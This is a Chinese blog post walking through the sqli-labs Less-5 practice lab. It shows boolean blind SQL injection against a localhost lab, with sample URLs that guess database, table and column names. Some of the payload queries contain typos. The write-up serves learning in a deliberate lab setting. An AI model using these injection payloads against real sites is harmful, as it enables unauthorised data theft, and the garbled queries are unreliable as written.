zoukankan      html  css  js  c++  java
  • sqli_labs less-5

    这一关主要用到sql盲注,从源代码中可以看到,运行返回结果正确的时候只返回you are in....,不会返回数据库当中的信息了。

    接下来我们用left()判断数据库版本。

    接下来我们用length() ASCII(),substring()来猜数据库名

    数据库的长度为8

     

    由此可知数据库是security()

    接着我们来猜表名

    这里我是直接猜的user表,我们可以通过修改substring(string,*,1)来猜表名,我们可以通过limit *,1来逐个猜表名。

    http://localhost:8080/sqli-labs/Less-5/?id=1" and ascii(substring(select table_name from information_schema.tables where schena_name=database()),1,1)=117--+

    利用正则表达regexp判断users中的列

    http://localhost:8080/sqli-labs/Less-5/?id=1" and 1=(select 1 from information_schema.columns where tables_name=users and column_name
    regexp "^us[a-z]" limit 0,1) --+

    上述语句时选择users表中的列名是否有us**的列

     

    上图中可以看到username存在。我们可以将username换成password等其他的项也是正确的。

  • 相关阅读:
    自动控制基础MATLAB 2
    钽电容和瓷片电容的对比
    自动控制原理基础 matlab 1
    Altium使用总结1
    Altium 各个层的作用
    C语言联合体的灵活运用
    windows清除日志
    Lingo 优化实例 出版社问题
    Lingo 0-1规划
    用CMD分类
  • 原文地址:https://www.cnblogs.com/wang1212-/p/8710061.html
Copyright © 2011-2022 走看看